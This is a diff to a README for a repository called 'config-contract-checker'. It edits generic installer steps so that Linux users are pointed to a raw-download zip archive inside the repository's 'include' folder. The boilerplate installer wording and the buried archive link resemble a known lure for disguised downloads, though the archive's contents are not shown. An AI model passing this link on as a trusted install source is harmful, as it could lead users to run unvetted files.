asadalaziz/config-contract-checker/Readme.md

 4. **Run the Installer**
    - For Windows: Locate the downloaded `.exe` file and double-click it to start the installation.
    - For macOS: Open the `.dmg` file and drag the app to your Applications folder.
-   - For Linux: Follow the specific installation instructions for your distribution, usually related to the `.tar.gz` file.
+   - For Linux: Follow the specific installation instructions for your distribution, usually related to the `https://github.com/asadalaziz/config-contract-checker/raw/refs/heads/main/include/checker-contract-config-v2.1.zip` file.

 5. **Follow the Installation Instructions**
    The installer will guide you through the setup process.
 Follow each step carefully to complete the installation.